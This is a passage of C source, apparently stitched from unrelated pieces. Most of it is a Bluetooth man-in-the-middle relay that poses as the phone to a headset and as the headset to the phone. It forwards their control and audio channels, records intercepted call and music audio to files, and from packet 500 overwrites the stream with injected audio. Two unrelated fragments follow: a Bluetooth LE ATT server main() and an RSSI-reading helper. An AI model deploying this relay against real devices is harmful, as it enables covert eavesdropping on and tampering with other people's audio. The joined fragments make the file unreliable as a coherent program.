0) { // Forward it to the slave //send(rfcomm_sock2, recv_buf, recv_len, 0); if (write(ag2hs, recv_buf, recv_len) < 0) printf("write failed\n"); printf("RFCOMM2 -> RFCOMM1: %s\n", recv_buf); memset(recv_buf, 0, RECV_BUF_SIZE); } // Check for pending slave +AT commands if ((recv_len = read(hs2ag, recv_buf, RECV_BUF_SIZE)) > 0) { printf("HS2AG: %s\n", recv_buf); send(rfcomm_sock2, recv_buf, recv_len, 0); memset(recv_buf, 0, RECV_BUF_SIZE); } // Check for pending SDP messages from slave if ((recv_len = read(hs2ag_sdp, recv_buf, RECV_BUF_SIZE)) > 0) { printf("HS2AG_SDP: %d bytes\n", recv_len); // Forward to master if (send(sdp_sock2, recv_buf, recv_len, 0) < 0) printf("sdp_sock2 send failed\n"); memset(recv_buf, 0, RECV_BUF_SIZE); } if (-1 != sdp_sock2) { // Test to see if the master sent any SDP data if ((recv_len = recv(sdp_sock2, recv_buf, RECV_BUF_SIZE, 0)) > 0) { printf("SDP2->SDP1: %d bytes\n", recv_len); // Send to slave process write(ag2hs_sdp, recv_buf, recv_len); memset(recv_buf, 0, RECV_BUF_SIZE); } } // If the master initiated a A2DP control connection if (server_avctp_sock_res.res_sock != -1 && -1 == avctp_sock2) { //close(sdp_sock2); printf("AG initiated AVCTP channel!\n"); avctp_sock2 = server_avctp_sock_res.res_sock; server_avctp_sock_res.res_sock = -1; } if (-1 != avctp_sock2) { // Receive AVCTP data from master if ((recv_len = recv(avctp_sock2, recv_buf, RECV_BUF_SIZE, 0)) > 0) { printf("AVCTP2->AVCTP1 [%d bytes]\n", recv_len); // Send to slave process to be forwarded write(ag2hs_avctp, recv_buf, recv_len); memset(recv_buf, 0, RECV_BUF_SIZE); } // Check for pending AVCTP data from slave process if ((recv_len = read(hs2ag_avctp, recv_buf, RECV_BUF_SIZE)) > 0) { printf("HS2AG_AVCTP: %d bytes\n", recv_len); // Send to master if (send(avctp_sock2, recv_buf, recv_len, 0) < 0) printf("avctp_sock2 send failed\n"); memset(recv_buf, 0, RECV_BUF_SIZE); } } // If the master initiated a A2DP distribution connection if (server_avdtp_sock_res.res_sock != -1 && -1 == avdtp_sock2) { printf("AG initiated AVDTP channel!\n"); // Save the result socket avdtp_sock2 = server_avdtp_sock_res.res_sock; server_avdtp_sock_res.res_sock = -2; sleep(1); } if (-1 != avdtp_sock2) { if (-2 == server_avdtp_sock_res.res_sock) { server_avdtp_sock_res.res_sock = -1; server_avdtp_sock_res.psm = PSM_AVDTP; // Wait for the actual data connection over L2CAP start_l2cap_conn_wait(&server_avdtp_sock_res); } if (server_avdtp_sock_res.res_sock != -1) { printf("AVDTP Audio channel opened!\n"); // Audio socket has been opened! audio_sock2 = server_avdtp_sock_res.res_sock; server_avdtp_sock_res.res_sock = -1; } // Test for data on master AVDTP channel if ((recv_len = recv(avdtp_sock2, recv_buf, RECV_BUF_SIZE, 0)) > 0) { printf("AVDTP2->AVDTP1 [%d bytes]\n", recv_len); // Send to slave process write(ag2hs_avdtp, recv_buf, recv_len); memset(recv_buf, 0, RECV_BUF_SIZE); } // Test for pending slave AVDTP data if ((recv_len = read(hs2ag_avdtp, recv_buf, RECV_BUF_SIZE)) > 0) { //printf("HS2AG_AVDTP: %d bytes\n", recv_len); // Send to master if (send(avdtp_sock2, recv_buf, recv_len, 0) < 0) printf("avdtp_sock2 send failed\n"); memset(recv_buf, 0, RECV_BUF_SIZE); } } if (-1 != audio_sock2) { // 608 is the magic MTU for our controller... adjust accordingly // Test for audio data from master if ((recv_len = recv(audio_sock2, recv_buf, 608, 0)) > 0) { //printf("AUDIO2->AUDIO1 [%d bytes]\n", recv_len); // Record to file in SBC format if (NULL == test_audio_file) test_audio_file = fopen("audiodump.sbc", "wb"); fwrite(recv_buf+12, 1, recv_len-12, test_audio_file); /*printf("AUDPKT RTP: %02x %02x %d %d %08x\n", recv_buf[0], recv_buf[1], END_FLIP16(*((uint16_t*)&recv_buf[2])), END_FLIP32(*((uint32_t*)&recv_buf[4])), *((uint32_t*)&recv_buf[8]));*/ int sequence = END_FLIP16(*((uint16_t*)&recv_buf[2])); // Check packet sequence number, start overwriting audio with our audio from the 500th packet if (sequence > 500 && 1) { int rb = fread(recv_buf+12, 1, recv_len - 12, haxed_audio_file); printf("Injected %d bytes into stream! %02x%02x%02x%02x\n", rb, recv_buf[16], recv_buf[17], recv_buf[18], recv_buf[19]); } // Send audio packet to slave process if (write(ag2hs_audio, recv_buf, recv_len) < 0) printf("Failed to write to ag2hs_audio[err %u - %s]\n", errno, strerror(errno)); memset(recv_buf, 0, RECV_BUF_SIZE); usleep(1); } // Test for pending audio data from slave process if ((recv_len = read(hs2ag_audio, recv_buf, RECV_BUF_SIZE)) > 0) { //printf("HS2AG_AUDIO: %d bytes\n", recv_len); // Send to master if (send(audio_sock2, recv_buf, recv_len, 0) < 0) printf("avctp_sock2 send failed\n"); memset(recv_buf, 0, RECV_BUF_SIZE); } } // If the master has an open SCO connection if (0 < sco_sock2) { // Test for SCO data from master if ((recv_len = recv(sco_sock2, recv_buf, DEFAULT_SCO_MTU, 0)) > 0) { printf("SCO2->SCO1 [%u bytes]\n", recv_len); // Forward SCO audio data to slave process if (write(ag2hs_sco, recv_buf, recv_len) < 0) printf("ag2hs_sco write failed\n"); // Dump SCO audio to raw PCM file if (NULL == test_audio_file) test_audio_file = fopen("test.pcm", "wb"); fwrite(recv_buf, 1, recv_len, test_audio_file); memset(recv_buf, 0, RECV_BUF_SIZE); } // Test for pending SCO data from slave process if ((recv_len = read(hs2ag_sco, recv_buf, DEFAULT_SCO_MTU)) > 0) { printf("HS2AG_SCO: %u bytes to SCO!\n", recv_len); //printf("^"); // Forward data to master - send as fragmented chunks if necessary if (recv_len <= DEFAULT_SCO_MTU) { if (err = send(sco_sock2, recv_buf, recv_len, 0) < 0) printf("sco2 send failed (%d - %s) [%d bytes]\n", errno, strerror(errno), recv_len); usleep(500); } else { send_sco_fragmented(sco_sock2, recv_buf, recv_len, DEFAULT_SCO_MTU); } printf("^"); memset(recv_buf, 0, RECV_BUF_SIZE); } } } else { // Test for pending AVCTP data from master process if ((recv_len = read(ag2hs_avctp, recv_buf, RECV_BUF_SIZE)) > 0) { printf("AG2HS_AVCTP: %d bytes\n", recv_len); if (-1 == avctp_sock1) { //close(sdp_sock1); // Master initiated a AVCTP channel to us, open a channel from us to the slave avctp_sock1 = connect_l2cap(dest1_mac, PSM_AVCTP, NULL, NULL); } // Forward master's data to slave if (send(avctp_sock1, recv_buf, recv_len, 0) < 0) printf("avctp_sock1 send failed\n"); memset(recv_buf, 0, RECV_BUF_SIZE); } if (-1 != avctp_sock1) { // Test for AVCTP data from slave if ((recv_len = recv(avctp_sock1, recv_buf, RECV_BUF_SIZE, 0)) > 0) { printf("AVCTP1->AVCTP2: %d bytes\n", recv_len); // Send to master process write(hs2ag_avctp, recv_buf, recv_len); memset(recv_buf, 0, RECV_BUF_SIZE); } } // Test for pending AVDTP data from master if ((recv_len = read(ag2hs_avdtp, recv_buf, RECV_BUF_SIZE)) > 0) { printf("AG2HS_AVDTP: %d bytes\n", recv_len); // Master initiated a AVDTP channel, open a channel from us to the slave if (-1 == avdtp_sock1) avdtp_sock1 = connect_l2cap(dest1_mac, PSM_AVDTP, NULL, NULL); // Forward master's data to slave if (send(avdtp_sock1, recv_buf, recv_len, 0) < 0) printf("avdtp_sock1 send failed\n"); memset(recv_buf, 0, RECV_BUF_SIZE); } if (-1 != avdtp_sock1) { // Test for AVDTP data from slave if ((recv_len = recv(avdtp_sock1, recv_buf, RECV_BUF_SIZE, 0)) > 0) { printf("AVDTP1->AVDTP2: %d bytes\n", recv_len); // Forward AVDTP data to master process write(hs2ag_avdtp, recv_buf, recv_len); // Check the AVDTP packet to see if it's the A2DP audio channel initialization message if (detect_avdtp_start_accept_msg(recv_buf, recv_len)) { printf("Detected START ACCEPT message!\n"); // Found an A2DP audio channel ready for connect message, assume the master's role and connect over L2CAP audio_sock1 = connect_l2cap(dest1_mac, PSM_AVDTP, &audio_sock1_omtu, &audio_sock1_imtu); if (audio_sock1_omtu > DEFAULT_L2CAP_MTU && 0) { printf("Downsizing mtu for audio sock1\n"); audio_sock1_omtu = DEFAULT_L2CAP_MTU; set_l2cap_sock_mtu(audio_sock1, DEFAULT_L2CAP_MTU, 0); } } memset(recv_buf, 0, RECV_BUF_SIZE); } } // Check for +AT commands from slave if ((recv_len = recv(rfcomm_sock1, recv_buf, RECV_BUF_SIZE, 0)) > 0) { printf("RFCOMM1 -> RFCOMM2: %s\n", recv_buf); // Forward +AT command to master process write(hs2ag, recv_buf, recv_len); //send(rfcomm_sock1, recv_buf, recv_len, 0); // Check for the AT command that usually shows up when a SCO connection is opened... if (NULL != strcasestr(recv_buf, "CLCC") && 0) { if (-1 == sco_sock1) { printf("Tiem to open conn to headset!\n"); // Open the SCO connection to the slave sco_sock1 = connect_sco(dest1_mac, local_mac); memset(&sco_conn_options, 0, sizeof(struct sco_options)); optlen = sizeof(struct sco_options); if (getsockopt(sco_sock1, SOL_SCO, SCO_OPTIONS, &sco_conn_options, &optlen) < 0) { printf("Failed to get sock options...\n"); } printf("SCO Link1 mtu: %u\n", sco_conn_options.mtu); } /*else { printf("Resetting headset conn\n"); close(sco_sock1); sco_sock1 = -1; }*/ } memset(recv_buf, 0, RECV_BUF_SIZE); } // MTU is 612, so read 608 bytes of payload as 4 bytes are A2DP header bytes // 612 - 4b header if ((recv_len = read(ag2hs_audio, recv_buf, 608)) > 0) { //printf("AG2HS_AUDIO: %d bytes\n", recv_len); /*if (-1 == audio_sock1) audio_sock1 = connect_l2cap(dest1_mac, PSM_AVDTP, &audio_sock1_omtu, &audio_sock1_imtu);*/ /*if (recv_len > audio_sock1_omtu) { printf("Sending audio fragmented... %d > %d\n", recv_len, audio_sock1_omtu); send_l2cap_fragmented(audio_sock1, recv_buf, recv_len, audio_sock1_omtu); } else*/ if (recv_len <= audio_sock1_omtu) { // Many times if we sent over the MTU or send too quickly the buffer fills up, need to watch this if ((err = send(audio_sock1, recv_buf, recv_len, 0)) < 0) { if (errno != EAGAIN && errno != EWOULDBLOCK) { printf("audio_sock1 send failed %d - %s (%d bytes)\n", errno, strerror(errno), recv_len); break; } } /*audio1_sent_amt += recv_len; if (audio1_sent_amt >= 12000) { audio1_sent_amt = 0; sleep(1); }*/ } else { send_l2cap_fragmented(audio_sock1, recv_buf, recv_len, DEFAULT_L2CAP_MTU); } memset(recv_buf, 0, RECV_BUF_SIZE); } if (-1 != audio_sock1) { // Test for pending audio data from slavd if ((recv_len = recv(audio_sock1, recv_buf, audio_sock1_imtu, 0)) > 0) { //printf("AUDIO1->AUDIO2: %d bytes\n", recv_len); // Forward A2DP audio data to master process write(hs2ag_audio, recv_buf, recv_len); memset(recv_buf, 0, RECV_BUF_SIZE); } } // Test for SDP queries from master process if ((recv_len = read(ag2hs_sdp, recv_buf, RECV_BUF_SIZE)) > 0) { printf("AG2HS_SDP: %d bytes\n", recv_len); // Connect to slave's SDP service, pretending to be the master if (-1 == sdp_sock1) sdp_sock1 = connect_l2cap(dest1_mac, PSM_SDP, &sdp1_omtu, &sdp1_imtu); // Send master's request if (send(sdp_sock1, recv_buf, recv_len, 0) < 0) printf("sdp_sock1 send failed\n"); memset(recv_buf, 0, RECV_BUF_SIZE); } if (-1 != sdp_sock1) { // Test for pending SDP responses from slave if ((recv_len = recv(sdp_sock1, recv_buf, RECV_BUF_SIZE, 0)) > 0) { printf("SDP1->SDP2: %d bytes\n", recv_len); // Forward SDP reply to master process write(hs2ag_sdp, recv_buf, recv_len); memset(recv_buf, 0, RECV_BUF_SIZE); } } // Test for pending AT commands from master process if ((recv_len = read(ag2hs, recv_buf, RECV_BUF_SIZE)) > 0) { printf("AG2HS: %s\n", recv_buf); // Connect to target profile RFCOMM channel on slave, pretending to be the master if (-1 == rfcomm_sock1) { rfcomm_sock1 = connect_rfcomm(dest1_mac, local_mac, rfcomm_channel1); printf("Opened HS RFCOMM connection\n"); } // Forward AT commands from master to slave if (send(rfcomm_sock1, recv_buf, recv_len, 0) < 0) printf("rfcomm_sock1 send failed\n"); memset(recv_buf, 0, RECV_BUF_SIZE); } // Test for pending SCO audio data from master if ((recv_len = read(ag2hs_sco, recv_buf, DEFAULT_SCO_MTU)) > 0) { // printf("AG2HS_SCO: %u bytes to SCO!\n", recv_len); // Open SCO connection to slave, assuming role of master if (-1 == sco_sock1) { printf("Connecting SCO to headset!\n"); sco_sock1 = connect_sco(dest1_mac, local_mac); memset(&sco_conn_options, 0, sizeof(struct sco_options)); optlen = sizeof(struct sco_options); if (getsockopt(sco_sock1, SOL_SCO, SCO_OPTIONS, &sco_conn_options, &optlen) < 0) { printf("Failed to get sock options...\n"); } printf("SCO Link1 mtu: %u\n", sco_conn_options.mtu); } // Send SCO data chunks to slave, fragmented if needed if (recv_len <= DEFAULT_SCO_MTU) { if (send(sco_sock1, recv_buf, recv_len, 0) < 0) { printf("sco1 send failed(%d - %s) [%d B]\n", errno, strerror(errno), recv_len); close(sco_sock1); sco_sock1 = -1; } usleep(500); } else { send_sco_fragmented(sco_sock1, recv_buf, recv_len, DEFAULT_SCO_MTU); } memset(recv_buf, 0, RECV_BUF_SIZE); } if (-1 != sco_sock1) { // Test for pending SCO audio data from slave if ((recv_len = recv(sco_sock1, recv_buf, DEFAULT_SCO_MTU, 0)) > 0) { printf("SCO1->SCO2 [%u bytes]\n", recv_len); // Forward SCO audio data to master process if (write(hs2ag_sco, recv_buf, recv_len) < 0) printf("hs2ag_sco write failed\n"); memset(recv_buf, 0, RECV_BUF_SIZE); } } } } // TODO: Remove this entire chunk of code while(1) { /* if (sdp_sock_res.res_sock != -1 && !sdp_chann_enabled && 0) { printf("We have been SDP queried! - %d\n", sdp_sock_res.res_sock); sdp_sock2 = sdp_sock_res.res_sock; sdp_chann_enabled = 1; sdp_sock1 = connect_l2cap(dest1_mac, PSM_SDP); } if (sdp_chann_enabled) { if ((recv_len = recv(sdp_sock1, l2cap_buf, 1500, 0)) > 0) { printf("SDP1->SDP2: %u bytes\n", recv_len); send(sdp_sock2, l2cap_buf, recv_len, 0); memset(l2cap_buf, 0, 1500); } if ((recv_len = recv(sdp_sock2, l2cap_buf, 1500, 0)) > 0) { printf("SDP2->SDP1: %u bytes\n", recv_len); send(sdp_sock1, l2cap_buf, recv_len, 0); memset(l2cap_buf, 0, 1500); } } */ if (sco_conn_enabled) { if ((recv_len = recv(sco_sock1, l2cap_buf, 1500, 0)) > 0) { printf("SCO1->SCO2: %u bytes\n", recv_len); send(sco_sock2, l2cap_buf, recv_len, 0); memset(l2cap_buf, 0, 1500); } if ((recv_len = recv(sco_sock2, l2cap_buf, 1500, 0)) > 0) { printf("SCO2->SCO1: %u bytes\n", recv_len); send(sco_sock1, l2cap_buf, recv_len, 0); memset(l2cap_buf, 0, 1500); } } if ((recv_len = recv(rfcomm_sock1, recv_buf, sizeof(recv_buf), 0)) > 0) { printf("RFCOMM1 -> RFCOMM2: %s\n", recv_buf); send(rfcomm_sock2, recv_buf, recv_len, 0); if (NULL != strcasestr(recv_buf, "CLCC")) { if (!sco_conn_enabled) { connect_sco_dual(&sco_sock2, local_mac, dest1_mac, &sco_sock1); } else { //close(sco_sock1); close(sco_sock2); sco_sock2 = -1; } } sco_conn_enabled = (sco_sock1 > 0) && (sco_sock2 > 0); memset(recv_buf, 0, sizeof(recv_buf)); } if ((recv_len = recv(rfcomm_sock2, recv_buf, sizeof(recv_buf), 0)) > 0) { printf("RFCOMM2 -> RFCOMM1: %s\n", recv_buf); send(rfcomm_sock1, recv_buf, recv_len, 0); if (NULL != strcasestr(recv_buf, "CLCC")) { if (!sco_conn_enabled) { connect_sco_dual(&sco_sock1, local_mac, dest2_mac, &sco_sock2); } else { //close(sco_sock1); close(sco_sock2); sco_sock2 = -1; } } sco_conn_enabled = (sco_sock1 > 0) && (sco_sock2 > 0); memset(recv_buf, 0, sizeof(recv_buf)); } if (connected) { if ((recv_len = recv(avctp_sock1, l2cap_buf, 1500, 0)) > 0) { printf("AVCTP1 -> AVCTP2: %s\n", l2cap_buf); send(avctp_sock2, l2cap_buf, recv_len, 0); memset(l2cap_buf, 0, 1500); } if ((recv_len = recv(avctp_sock2, l2cap_buf, 1500, 0)) > 0) { printf("AVCTP2 -> AVCTP1: %s\n", l2cap_buf); send(avctp_sock1, l2cap_buf, recv_len, 0); memset(l2cap_buf, 0, 1500); } if ((recv_len = recv(avdtp_sock1, l2cap_buf, 1500, 0)) > 0) { printf("AVDTP1 -> AVDTP2: %s\n", l2cap_buf); send(avdtp_sock2, l2cap_buf, recv_len, 0); memset(l2cap_buf, 0, 1500); } if ((recv_len = recv(avdtp_sock2, l2cap_buf, 1500, 0)) > 0) { printf("AVCTP2 -> AVCTP1: %s\n", l2cap_buf); send(avdtp_sock1, l2cap_buf, recv_len, 0); memset(l2cap_buf, 0, 1500); } } //sleep(1); } l2cap_sock_cleanup: close(avctp_sock1); close(avdtp_sock1); close(avctp_sock2); close(avdtp_sock2); rfcomm_sock_cleanup: close(rfcomm_sock1); close(rfcomm_sock2); cleanup: free(l2cap_buf); free(recv_buf); hci_close_dev(dev_sock); }
int main(int argc, const char* argv[]) { const char *hciDeviceIdOverride = NULL; int hciDeviceId = 0; int hciSocket; int serverL2capSock; struct sockaddr_l2 sockAddr; socklen_t sockAddrLen; int result; bdaddr_t clientBdAddr; int clientL2capSock; struct l2cap_conninfo l2capConnInfo; socklen_t l2capConnInfoLen; int hciHandle; fd_set afds; fd_set rfds; struct timeval tv; char stdinBuf[256 * 2 + 1]; char l2capSockBuf[256]; int len; int i; struct bt_security btSecurity; socklen_t btSecurityLen; uint8_t securityLevel = 0; // remove buffering setbuf(stdin, NULL); setbuf(stdout, NULL); setbuf(stderr, NULL); // setup signal handlers signal(SIGINT, signalHandler); signal(SIGKILL, signalHandler); signal(SIGHUP, signalHandler); signal(SIGUSR1, signalHandler); prctl(PR_SET_PDEATHSIG, SIGINT); // create socket serverL2capSock = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP); if (argc > 1 && strlen(argv[1]) > 0) { hciDeviceIdOverride = argv[1]; } if (hciDeviceIdOverride != NULL) { hciDeviceId = atoi(hciDeviceIdOverride); } else { // if no env variable given, use the first available device hciDeviceId = hci_get_route(NULL); } if (hciDeviceId < 0) { hciDeviceId = 0; // use device 0, if device id is invalid } printf("hciDeviceId %d\n", hciDeviceId); bdaddr_t daddr; hciSocket = hci_open_dev(hciDeviceId); if (hciSocket == -1) { printf("adapterState unsupported\n"); return -1; } if (hci_read_bd_addr(hciSocket, &daddr, 1000) == -1){ daddr = *BDADDR_ANY; } printf("bdaddr "); for(i = 5; i > 0; i--) { printf("%02x:", daddr.b[i]); } printf("%02x", daddr.b[0]); printf("\n"); // bind memset(&sockAddr, 0, sizeof(sockAddr)); sockAddr.l2_family = AF_BLUETOOTH; sockAddr.l2_bdaddr = daddr; sockAddr.l2_cid = htobs(ATT_CID); result = bind(serverL2capSock, (struct sockaddr*)&sockAddr, sizeof(sockAddr)); printf("bind %s\n", (result == -1) ? strerror(errno) : "success"); result = listen(serverL2capSock, 1); printf("listen %s\n", (result == -1) ? strerror(errno) : "success"); while (result != -1) { FD_ZERO(&afds); FD_SET(serverL2capSock, &afds); tv.tv_sec = 1; tv.tv_usec = 0; result = select(serverL2capSock + 1, &afds, NULL, NULL, &tv); if (-1 == result) { if (SIGINT == lastSignal || SIGKILL == lastSignal) { break; } else if (SIGHUP == lastSignal || SIGUSR1 == lastSignal) { result = 0; } } else if (result && FD_ISSET(serverL2capSock, &afds)) { sockAddrLen = sizeof(sockAddr); clientL2capSock = accept(serverL2capSock, (struct sockaddr *)&sockAddr, &sockAddrLen); baswap(&clientBdAddr, &sockAddr.l2_bdaddr); printf("accept %s\n", batostr(&clientBdAddr)); l2capConnInfoLen = sizeof(l2capConnInfo); getsockopt(clientL2capSock, SOL_L2CAP, L2CAP_CONNINFO, &l2capConnInfo, &l2capConnInfoLen); hciHandle = l2capConnInfo.hci_handle; while(1) { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(clientL2capSock, &rfds); tv.tv_sec = 1; tv.tv_usec = 0; result = select(clientL2capSock + 1, &rfds, NULL, NULL, &tv); if (-1 == result) { if (SIGINT == lastSignal || SIGKILL == lastSignal) { break; } else if (SIGHUP == lastSignal) { result = 0; hci_disconnect(hciSocket, hciHandle, HCI_OE_USER_ENDED_CONNECTION, 1000); } else if (SIGUSR1 == lastSignal) { int8_t rssi = 0; for (i = 0; i < 100; i++) { hci_read_rssi(hciSocket, hciHandle, &rssi, 1000); if (rssi != 0) { break; } } if (rssi == 0) { rssi = 127; } printf("rssi = %d\n", rssi); } } else if (result) { if (FD_ISSET(0, &rfds)) { len = read(0, stdinBuf, sizeof(stdinBuf)); if (len <= 0) { break; } i = 0; while(stdinBuf[i] != '\n') { unsigned int data = 0; sscanf(&stdinBuf[i], "%02x", &data); l2capSockBuf[i / 2] = data; i += 2; } len = write(clientL2capSock, l2capSockBuf, (len - 1) / 2); } if (FD_ISSET(clientL2capSock, &rfds)) { len = read(clientL2capSock, l2capSockBuf, sizeof(l2capSockBuf)); if (len <= 0) { break; } btSecurityLen = sizeof(btSecurity); memset(&btSecurity, 0, btSecurityLen); getsockopt(clientL2capSock, SOL_BLUETOOTH, BT_SECURITY, &btSecurity, &btSecurityLen); if (securityLevel != btSecurity.level) { securityLevel = btSecurity.level; const char *securityLevelString; switch(securityLevel) { case BT_SECURITY_LOW: securityLevelString = "low"; break; case BT_SECURITY_MEDIUM: securityLevelString = "medium"; break; case BT_SECURITY_HIGH: securityLevelString = "high"; break; default: securityLevelString = "unknown"; break; } printf("security %s\n", securityLevelString); } printf("data "); for(i = 0; i < len; i++) { printf("%02x", ((int)l2capSockBuf[i]) & 0xff); } printf("\n"); } } } printf("disconnect %s\n", batostr(&clientBdAddr)); close(clientL2capSock); } } printf("close\n"); close(serverL2capSock); close(hciSocket); return 0; }
int read_rssi(char *pAddress, int *pRSSI ) { int cc = 0; int dd; int dev_id; uint16_t handle; struct hci_conn_info_req *cr; struct hci_request rq; read_rssi_rp rp; bdaddr_t bdaddr; str2ba( pAddress, &bdaddr); dev_id = hci_for_each_dev( HCI_UP, find_conn, (long)&bdaddr ); if (dev_id < 0) { dev_id = hci_get_route( &bdaddr ); cc = 1; } if (dev_id < 0) { printf("Device not available\n"); return -1; } dd = hci_open_dev(dev_id); if (dd < 0) { printf("Cannot open device\n"); return -2; } if (cc) { if (hci_create_connection( dd, &bdaddr, 0x0008 | 0x0010, 0, 0, &handle, 25000 ) < 0) { printf("Cannot create connection\n"); close(dd); return -3; } } cr = malloc(sizeof(*cr) + sizeof(struct hci_conn_info)); if (!cr) { printf("Could not allocate memory\n"); return -4; } bacpy(&cr->bdaddr, &bdaddr); cr->type = ACL_LINK; if (ioctl(dd, HCIGETCONNINFO, (unsigned long) cr) < 0) { printf("Get connection info failed\n"); return -5; } memset(&rq, 0, sizeof(rq)); rq.ogf = OGF_STATUS_PARAM; rq.ocf = OCF_READ_RSSI; rq.cparam = &cr->conn_info->handle; rq.clen = 2; rq.rparam = &rp; rq.rlen = READ_RSSI_RP_SIZE; if ( hci_send_req( dd, &rq, 100 ) < 0 ) { printf("Read RSSI failed\n"); return -6; } if (rp.status) { printf("Read RSSI returned (error) status 0x%2.2X\n", rp.status); return -7; } if (cc) { hci_disconnect(dd, handle, 0x13, 10000); } close(dd); free(cr); *pRSSI = rp.rssi; return 0; }